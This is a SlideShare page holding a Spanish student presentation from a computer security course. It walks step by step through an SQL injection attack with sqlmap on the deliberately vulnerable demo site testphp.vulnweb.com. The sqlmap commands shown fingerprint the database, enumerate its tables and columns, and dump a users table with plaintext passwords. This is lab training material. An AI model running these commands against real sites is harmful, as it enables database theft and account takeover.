SlideShare una empresa de Scribd logo

Ataque con inyeccion de codigo sql a sitio web

Descargar como PPTX, PDF
Daycith Gonzalez
Daycith Gonzalez

Este documento contiene proceso de inyección sql a sitio http://testphp.vulnweb.com, obteniendo información de servidor y motor de base de datos, base de datos, tablas, columnas, y registros.

Ingeniería
1 de 11
Especialización en Seguridad Informática • Ataque con inyección de código SQL a sitio web Estudiante: Daycith González Rodriguez Corozal, Septiembre de 2014
Ataque con inyección de código SQL a sitio web 1. Para la ejecución de sqlmap primero fue necesaria su instalación. El proceso se realizó en sistema operativo Linux Server 14 LS, como se muestra a continuación: 1. Se instaló git, el cual es un software de control de versiones. Esta herramienta es necesaria para descargar el proyecto sqlmap.
2. Seguidamente se descargó el paquete de sqlmap. Este se obtiene desde git://github.com/sqlmappro ject/sqlmap.git Ataque con inyección de código SQL a sitio web
3. Esperamos a que se descargue e instale todo el paquete, incluyendo python. Ataque con inyección de código SQL a sitio web
Ataque con inyección de código SQL a sitio web 4. Se realiza una navegación por el sitio para identificar puntos vulnerables. En la url del navegador se introdujo el signo % antes del valor de la variable cat: http://testphp.vulnweb.com/listproducts.php?cat=%1
Ataque con inyección de código SQL a sitio web 5. Seguidamente se procedió a identificar el sistema operativo y el motor de base de datos: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -b
Ataque con inyección de código SQL a sitio web 6. Se obtiene la base de datos utilizada por el sitio, utilizando la linea: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db
7. Una vez identificadas la base de datos, procedemos a extraer información, empezando por sus tablas: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -- tables Ataque con inyección de código SQL a sitio web
Ataque con inyección de código SQL a sitio web 8. Decidimos revisar la información de la tabla user, ejecutando la siguiente línea para conocer sus columnas: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
Ataque con inyección de código SQL a sitio web 9. Luego procedemos a extraer la información de las columnas name, uname y pass; contando con la suerte de poder ver el valor de la contraseña en claro: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C name,uname,pass --dump
Ataque con inyección de código SQL a sitio web 10. Con los datos extraídos fuimos capaces de navegar en el sitio, lo que nos permitiría hacer estragos en la aplicación:

Recomendados

It depends: Loving .NET Core dependency injection or not
It depends: Loving .NET Core dependency injection or notIt depends: Loving .NET Core dependency injection or not
It depends: Loving .NET Core dependency injection or notAlex Thissen
 
Competencias técnico enfermería unidad de recuperación - CICAT-SALUD
Competencias técnico enfermería unidad de recuperación - CICAT-SALUDCompetencias técnico enfermería unidad de recuperación - CICAT-SALUD
Competencias técnico enfermería unidad de recuperación - CICAT-SALUDCICAT SALUD
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datosFernando Hernandez
 
Seguridad Base De Datos
Seguridad Base De DatosSeguridad Base De Datos
Seguridad Base De Datosangela zambrano
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql webkateqr
 
Sql injection utilizando método post
Sql injection utilizando método postSql injection utilizando método post
Sql injection utilizando método postTensor
 
Seguridad Base de datos
Seguridad Base de datos Seguridad Base de datos
Seguridad Base de datos nataliaynecheevrry
 
Seguridad de la base de datos
Seguridad de la base de datosSeguridad de la base de datos
Seguridad de la base de datososandcr
 

Recomendados

It depends: Loving .NET Core dependency injection or not
It depends: Loving .NET Core dependency injection or notIt depends: Loving .NET Core dependency injection or not
It depends: Loving .NET Core dependency injection or notAlex Thissen
 
Competencias técnico enfermería unidad de recuperación - CICAT-SALUD
Competencias técnico enfermería unidad de recuperación - CICAT-SALUDCompetencias técnico enfermería unidad de recuperación - CICAT-SALUD
Competencias técnico enfermería unidad de recuperación - CICAT-SALUDCICAT SALUD
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datosFernando Hernandez
 
Seguridad Base De Datos
Seguridad Base De DatosSeguridad Base De Datos
Seguridad Base De Datosangela zambrano
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql webkateqr
 
Sql injection utilizando método post
Sql injection utilizando método postSql injection utilizando método post
Sql injection utilizando método postTensor
 
Seguridad Base de datos
Seguridad Base de datos Seguridad Base de datos
Seguridad Base de datos nataliaynecheevrry
 
Seguridad de la base de datos
Seguridad de la base de datosSeguridad de la base de datos
Seguridad de la base de datososandcr
 
Hacking Ético Web
Hacking Ético WebHacking Ético Web
Hacking Ético WebEduardo Arriols Nuñez
 
Scripting cliente
Scripting clienteScripting cliente
Scripting clienteUAEH
 
Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Eduardo Arriols Nuñez
 
Herramientas y Técnicas de Inyeción SQL
Herramientas y Técnicas de Inyeción SQLHerramientas y Técnicas de Inyeción SQL
Herramientas y Técnicas de Inyeción SQLDavid Albela Pérez
 
Disenando Sistemas empleando el modelo de capas en desarrollo de software
Disenando Sistemas empleando el modelo de capas en desarrollo de softwareDisenando Sistemas empleando el modelo de capas en desarrollo de software
Disenando Sistemas empleando el modelo de capas en desarrollo de softwareAlexander Calderón
 
Seguridad en Base de Datos
Seguridad en Base de DatosSeguridad en Base de Datos
Seguridad en Base de Datosmyriam sarango
 
Arquitectura 3 Capas
Arquitectura 3 CapasArquitectura 3 Capas
Arquitectura 3 CapasFani Calle
 
Webinar Gratuito "Ataques a Bases de Datos"
Webinar Gratuito "Ataques a Bases de Datos"Webinar Gratuito "Ataques a Bases de Datos"
Webinar Gratuito "Ataques a Bases de Datos"Alonso Caballero
 
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGalexander valencia valderrama
 
Ataque inyeccion sql
Ataque inyeccion sqlAtaque inyeccion sql
Ataque inyeccion sqlDaniel L.
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingMagda Mayery Baquero Cardona
 
Present3
Present3Present3
Present3Rafael Cornejo Martinez
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosCarlos Otero
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploitDaniel
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodriarodri7703
 
Reto Hacker1 2020-2021
Reto Hacker1 2020-2021Reto Hacker1 2020-2021
Reto Hacker1 2020-2021Amador Aparicio
 
Presentación ataque 1 sql
Presentación ataque 1 sqlPresentación ataque 1 sql
Presentación ataque 1 sqlAlexander Valderrama
 
MANUAL POO
MANUAL POOMANUAL POO
MANUAL POOWILBER BAUTISTA PIZARRO
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTJose Gonzales
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeatCISObeat
 

Más contenido relacionado

Destacado

Scripting cliente
Scripting clienteScripting cliente
Scripting clienteUAEH
 
Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Eduardo Arriols Nuñez
 
Herramientas y Técnicas de Inyeción SQL
Herramientas y Técnicas de Inyeción SQLHerramientas y Técnicas de Inyeción SQL
Herramientas y Técnicas de Inyeción SQLDavid Albela Pérez
 
Disenando Sistemas empleando el modelo de capas en desarrollo de software
Disenando Sistemas empleando el modelo de capas en desarrollo de softwareDisenando Sistemas empleando el modelo de capas en desarrollo de software
Disenando Sistemas empleando el modelo de capas en desarrollo de softwareAlexander Calderón
 
Seguridad en Base de Datos
Seguridad en Base de DatosSeguridad en Base de Datos
Seguridad en Base de Datosmyriam sarango
 
Arquitectura 3 Capas
Arquitectura 3 CapasArquitectura 3 Capas
Arquitectura 3 CapasFani Calle
 
Webinar Gratuito "Ataques a Bases de Datos"
Webinar Gratuito "Ataques a Bases de Datos"Webinar Gratuito "Ataques a Bases de Datos"
Webinar Gratuito "Ataques a Bases de Datos"Alonso Caballero
 

Destacado (8)

Hacking Ético Web
Hacking Ético WebHacking Ético Web
Hacking Ético Web
 
Scripting cliente
Scripting clienteScripting cliente
Scripting cliente
 
Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]
 
Herramientas y Técnicas de Inyeción SQL
Herramientas y Técnicas de Inyeción SQLHerramientas y Técnicas de Inyeción SQL
Herramientas y Técnicas de Inyeción SQL
 
Disenando Sistemas empleando el modelo de capas en desarrollo de software
Disenando Sistemas empleando el modelo de capas en desarrollo de softwareDisenando Sistemas empleando el modelo de capas en desarrollo de software
Disenando Sistemas empleando el modelo de capas en desarrollo de software
 
Seguridad en Base de Datos
Seguridad en Base de DatosSeguridad en Base de Datos
Seguridad en Base de Datos
 
Arquitectura 3 Capas
Arquitectura 3 CapasArquitectura 3 Capas
Arquitectura 3 Capas
 
Webinar Gratuito "Ataques a Bases de Datos"
Webinar Gratuito "Ataques a Bases de Datos"Webinar Gratuito "Ataques a Bases de Datos"
Webinar Gratuito "Ataques a Bases de Datos"
 

Similar a Ataque con inyeccion de codigo sql a sitio web

Ataque inyeccion sql
Ataque inyeccion sqlAtaque inyeccion sql
Ataque inyeccion sqlDaniel L.
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosCarlos Otero
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploitDaniel
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodriarodri7703
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTJose Gonzales
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeatCISObeat
 
Presentacion #bbmnk
Presentacion #bbmnkPresentacion #bbmnk
Presentacion #bbmnkJuan Miqueo
 
Tecnicas de documentacion tesis
Tecnicas de documentacion tesisTecnicas de documentacion tesis
Tecnicas de documentacion tesisLuis Villacres
 
Desarrollo de apps móviles con Apache Cordova
Desarrollo de apps móviles con Apache CordovaDesarrollo de apps móviles con Apache Cordova
Desarrollo de apps móviles con Apache CordovaSoftware Guru
 

Similar a Ataque con inyeccion de codigo sql a sitio web (20)

ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 
Ataque inyeccion sql
Ataque inyeccion sqlAtaque inyeccion sql
Ataque inyeccion sql
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Present3
Present3Present3
Present3
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Reto Hacker1 2020-2021
Reto Hacker1 2020-2021Reto Hacker1 2020-2021
Reto Hacker1 2020-2021
 
Presentación ataque 1 sql
Presentación ataque 1 sqlPresentación ataque 1 sql
Presentación ataque 1 sql
 
MANUAL POO
MANUAL POOMANUAL POO
MANUAL POO
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
 
Presentacion #bbmnk
Presentacion #bbmnkPresentacion #bbmnk
Presentacion #bbmnk
 
Tecnicas de documentacion tesis
Tecnicas de documentacion tesisTecnicas de documentacion tesis
Tecnicas de documentacion tesis
 
Seguridad de las Redes
Seguridad de las RedesSeguridad de las Redes
Seguridad de las Redes
 
Comandar un pic a través de internet
Comandar un pic a través de internetComandar un pic a través de internet
Comandar un pic a través de internet
 
Desarrollo de apps móviles con Apache Cordova
Desarrollo de apps móviles con Apache CordovaDesarrollo de apps móviles con Apache Cordova
Desarrollo de apps móviles con Apache Cordova
 
Jdbc
JdbcJdbc
Jdbc
 

Último

PETROLEO triptico para estudiantes de educacion
PETROLEO triptico para estudiantes de educacionPETROLEO triptico para estudiantes de educacion
PETROLEO triptico para estudiantes de educacionctrlc3
 
DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )
DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )
DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )FELIXGUMERCINDOFLORE
 
Instalación de GLPI en Debian Linux paso a paso
Instalación de GLPI en Debian Linux paso a pasoInstalación de GLPI en Debian Linux paso a paso
Instalación de GLPI en Debian Linux paso a pasosanjinesfreddygonzal
 
4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx
4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx
4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptxalejandroconfor23
 
Diagrama de flujo "Resolución de problemas".pdf
Diagrama de flujo "Resolución de problemas".pdfDiagrama de flujo "Resolución de problemas".pdf
Diagrama de flujo "Resolución de problemas".pdfjoseabachesoto
 
Efecto. Fotovoltaico y paneles.pdf
Efecto. Fotovoltaico y paneles.pdfEfecto. Fotovoltaico y paneles.pdf
Efecto. Fotovoltaico y paneles.pdfadrianmunozriveros96
 
PresentaciónReto_Equipo6 Explicacion del reto de freno electromagnetico
PresentaciónReto_Equipo6 Explicacion del reto de freno electromagneticoPresentaciónReto_Equipo6 Explicacion del reto de freno electromagnetico
PresentaciónReto_Equipo6 Explicacion del reto de freno electromagneticoa00834109
 
Criterios de la primera y segunda derivada
Criterios de la primera y segunda derivadaCriterios de la primera y segunda derivada
Criterios de la primera y segunda derivadaYoverOlivares
 
Ergonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworking
Ergonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworkingErgonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworking
Ergonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworkingGonzalo141557
 
IMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdf
IMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdfIMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdf
IMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdfJonathanFernandoRodr
 
&PLC Ladder.pdf automatización industrial
&PLC Ladder.pdf automatización industrial&PLC Ladder.pdf automatización industrial
&PLC Ladder.pdf automatización industrialjulianmayta1
 
PRESENTACION REUNION DEL COMITE DE SEGURIDAD
PRESENTACION REUNION DEL COMITE DE SEGURIDADPRESENTACION REUNION DEL COMITE DE SEGURIDAD
PRESENTACION REUNION DEL COMITE DE SEGURIDADmirellamilagrosvf
 
BOTAnica mesias orland role.pptx1 ciclo agropecuaria
BOTAnica mesias orland role.pptx1 ciclo agropecuariaBOTAnica mesias orland role.pptx1 ciclo agropecuaria
BOTAnica mesias orland role.pptx1 ciclo agropecuariamesiassalazarpresent
 
Mecánica de fluidos 1 universidad continental
Mecánica de fluidos 1 universidad continentalMecánica de fluidos 1 universidad continental
Mecánica de fluidos 1 universidad continentalJOSHUASILVA36
 
Deilybeth Alaña - Operaciones Básicas - Construcción
Deilybeth Alaña - Operaciones Básicas - ConstrucciónDeilybeth Alaña - Operaciones Básicas - Construcción
Deilybeth Alaña - Operaciones Básicas - ConstrucciónDeilybethAinellAlaaY
 
14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf
14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf
14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdfDavidHunucoAlbornoz
 
GUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTAS
GUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTASGUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTAS
GUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTASClaudiaRamirez765933
 
UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.
UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.
UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.HaroldKewinCanaza1
 

Último (20)

PETROLEO triptico para estudiantes de educacion
PETROLEO triptico para estudiantes de educacionPETROLEO triptico para estudiantes de educacion
PETROLEO triptico para estudiantes de educacion
 
DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )
DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )
DISEÑO DE LOSAS EN UNA DIRECCION (CONCRETO ARMADO II )
 
Instalación de GLPI en Debian Linux paso a paso
Instalación de GLPI en Debian Linux paso a pasoInstalación de GLPI en Debian Linux paso a paso
Instalación de GLPI en Debian Linux paso a paso
 
4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx
4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx
4.Clase-DIAGRAMAS DE FLUJO DFD Programacion.pptx
 
Sistemas de posicionamiento global (G.P.S.).pdf
Sistemas de posicionamiento global (G.P.S.).pdfSistemas de posicionamiento global (G.P.S.).pdf
Sistemas de posicionamiento global (G.P.S.).pdf
 
Diagrama de flujo "Resolución de problemas".pdf
Diagrama de flujo "Resolución de problemas".pdfDiagrama de flujo "Resolución de problemas".pdf
Diagrama de flujo "Resolución de problemas".pdf
 
Efecto. Fotovoltaico y paneles.pdf
Efecto. Fotovoltaico y paneles.pdfEfecto. Fotovoltaico y paneles.pdf
Efecto. Fotovoltaico y paneles.pdf
 
PresentaciónReto_Equipo6 Explicacion del reto de freno electromagnetico
PresentaciónReto_Equipo6 Explicacion del reto de freno electromagneticoPresentaciónReto_Equipo6 Explicacion del reto de freno electromagnetico
PresentaciónReto_Equipo6 Explicacion del reto de freno electromagnetico
 
Criterios de la primera y segunda derivada
Criterios de la primera y segunda derivadaCriterios de la primera y segunda derivada
Criterios de la primera y segunda derivada
 
Ergonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworking
Ergonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworkingErgonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworking
Ergonomía_MÉTODO_ROSA. Evaluación de puesto de trabajo de oficina - coworking
 
IMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdf
IMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdfIMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdf
IMPORTANCIA DE LOS LIPIDOS EN FARMACIA.pdf
 
&PLC Ladder.pdf automatización industrial
&PLC Ladder.pdf automatización industrial&PLC Ladder.pdf automatización industrial
&PLC Ladder.pdf automatización industrial
 
PRESENTACION REUNION DEL COMITE DE SEGURIDAD
PRESENTACION REUNION DEL COMITE DE SEGURIDADPRESENTACION REUNION DEL COMITE DE SEGURIDAD
PRESENTACION REUNION DEL COMITE DE SEGURIDAD
 
BOTAnica mesias orland role.pptx1 ciclo agropecuaria
BOTAnica mesias orland role.pptx1 ciclo agropecuariaBOTAnica mesias orland role.pptx1 ciclo agropecuaria
BOTAnica mesias orland role.pptx1 ciclo agropecuaria
 
Mecánica de fluidos 1 universidad continental
Mecánica de fluidos 1 universidad continentalMecánica de fluidos 1 universidad continental
Mecánica de fluidos 1 universidad continental
 
DESVIACION
DESVIACION DESVIACION
DESVIACION
 
Deilybeth Alaña - Operaciones Básicas - Construcción
Deilybeth Alaña - Operaciones Básicas - ConstrucciónDeilybeth Alaña - Operaciones Básicas - Construcción
Deilybeth Alaña - Operaciones Básicas - Construcción
 
14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf
14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf
14. DISEÑO LOSA ALIGERADA MOD G VOLADO.pdf
 
GUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTAS
GUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTASGUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTAS
GUIA DE SEGURIDAD PARA MAQUINAS Y HERRAMIENTAS
 
UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.
UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.
UNIVERSIDAD NACIONAL ALTIPLANO PUNO - FACULTAD DE INGENIERIA MECANICA ELECTRICA.
 

Ataque con inyeccion de codigo sql a sitio web

  • 1. Especialización en Seguridad Informática • Ataque con inyección de código SQL a sitio web Estudiante: Daycith González Rodriguez Corozal, Septiembre de 2014
  • 2. Ataque con inyección de código SQL a sitio web 1. Para la ejecución de sqlmap primero fue necesaria su instalación. El proceso se realizó en sistema operativo Linux Server 14 LS, como se muestra a continuación: 1. Se instaló git, el cual es un software de control de versiones. Esta herramienta es necesaria para descargar el proyecto sqlmap.
  • 3. 2. Seguidamente se descargó el paquete de sqlmap. Este se obtiene desde git://github.com/sqlmappro ject/sqlmap.git Ataque con inyección de código SQL a sitio web
  • 4. 3. Esperamos a que se descargue e instale todo el paquete, incluyendo python. Ataque con inyección de código SQL a sitio web
  • 5. Ataque con inyección de código SQL a sitio web 4. Se realiza una navegación por el sitio para identificar puntos vulnerables. En la url del navegador se introdujo el signo % antes del valor de la variable cat: http://testphp.vulnweb.com/listproducts.php?cat=%1
  • 6. Ataque con inyección de código SQL a sitio web 5. Seguidamente se procedió a identificar el sistema operativo y el motor de base de datos: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -b
  • 7. Ataque con inyección de código SQL a sitio web 6. Se obtiene la base de datos utilizada por el sitio, utilizando la linea: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db
  • 8. 7. Una vez identificadas la base de datos, procedemos a extraer información, empezando por sus tablas: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -- tables Ataque con inyección de código SQL a sitio web
  • 9. Ataque con inyección de código SQL a sitio web 8. Decidimos revisar la información de la tabla user, ejecutando la siguiente línea para conocer sus columnas: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
  • 10. Ataque con inyección de código SQL a sitio web 9. Luego procedemos a extraer la información de las columnas name, uname y pass; contando con la suerte de poder ver el valor de la contraseña en claro: python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C name,uname,pass --dump
  • 11. Ataque con inyección de código SQL a sitio web 10. Con los datos extraídos fuimos capaces de navegar en el sitio, lo que nos permitiría hacer estragos en la aplicación: